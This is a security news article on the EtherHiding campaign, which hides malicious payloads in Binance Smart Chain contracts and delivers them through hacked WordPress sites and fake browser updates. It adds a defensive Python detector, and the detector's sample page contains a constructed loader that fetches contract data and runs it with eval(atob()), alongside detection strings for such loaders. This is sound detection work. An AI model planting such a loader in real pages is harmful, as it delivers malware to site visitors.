Cybercriminals have invented a new way to distribute malicious code. The technique, codenamed EtherHiding, targets WordPress vulnerabilities and leverages Binance Smart Chain contracts to conceal parts of malicious payloads delivered through fake browser updates. The threat was identified and extensively analyzed by Guardio, a cybersecurity research company.
Using the malicious code, attackers are able to remotely control the defaced website, modify the infection process, and display any content they want, including bogus browser update notifications that serve as a vehicle for distributing malware. They can also change tactics, update blocked domains, and replace detected payloads without having to re-access the WordPress sites.
In the initial attacks, the second-stage code was hosted on Cloudflare Workers, but Cloudflare blocked these accounts, potentially disrupting the campaign. In the evolution of "ClearFake," cybercriminals have developed a new method for hosting malicious code anonymously and without any risk of being blocked: a form of bulletproof hosting provided by the Binance Smart Chain blockchain, where a read-only contract holds the code and no single host can be taken down.
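As an added defensive illustration (not code from the article or from Guardio's analysis), the heuristic below scans a page's inline scripts for the two traits an EtherHiding-style loader must combine: contact with a Binance Smart Chain JSON-RPC node and execution of data it decodes. The indicator strings, the sample HTML and the zeroed contract address are all assumptions constructed for this example.

```python
import re

# Assumed heuristics, not indicators published by the article: the loader has to
# reach a BSC RPC node (public hostnames, chain id 56, read-only eth_call) and
# then execute whatever it decoded from the contract response.
BSC_RPC_HINTS = ("bsc-dataseed", "binance.org", "eth_call", "chainid")
EXEC_HINTS = ("eval(", "new Function(", "atob(", "document.write(")

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)


def scan_html(html):
    """Return [(script_index, rpc_hits, exec_hits)] for every inline <script>
    that both talks to a BSC RPC endpoint and executes decoded content.
    Scripts with only one of the two traits are not reported, which keeps
    ordinary web3 front-ends and ordinary atob() users out of the results."""
    findings = []
    for i, body in enumerate(SCRIPT_RE.findall(html)):
        low = body.lower()
        rpc_hits = [h for h in BSC_RPC_HINTS if h in low]
        exec_hits = [h for h in EXEC_HINTS if h in body]
        if rpc_hits and exec_hits:
            findings.append((i, rpc_hits, exec_hits))
    return findings


# Constructed sample page: two benign scripts followed by an injected loader
# shaped like the technique described above (placeholder contract address).
SAMPLE_HTML = """<html><body>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script>document.title = "Example blog";</script>
<script>
  const p = new ethers.providers.JsonRpcProvider("https://bsc-dataseed1.binance.org/");
  const c = new ethers.Contract("0x0000000000000000000000000000000000000000", abi, p);
  c.get().then(r => eval(atob(r)));
</script>
</body></html>"""

if __name__ == "__main__":
    for idx, rpc, ex in scan_html(SAMPLE_HTML):
        print(f"script #{idx}: rpc={rpc} exec={ex}")
```

Run it against exported page source or WordPress theme/plugin files after a suspected compromise; a hit is a prompt for manual review, not proof of infection.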
The EtherHiding method makes takedowns difficult and lets criminals get away unpunished, illustrating the legal challenges posed by decentralized technologies. "A critical point of intervention to halt such campaigns lies in understanding why WordPress sites are so vulnerable and frequently compromised, as they serve as primary gateways for these threats to reach a vast pool of victims," Guardio authors explain.
"To protect your site and, eventually, all your visitors, you should always keep your WordPress infra and plugins updated, safeguarding credentials, using robust, periodically-changed passwords and just keeping an eye on what is happening in your site," they suggest.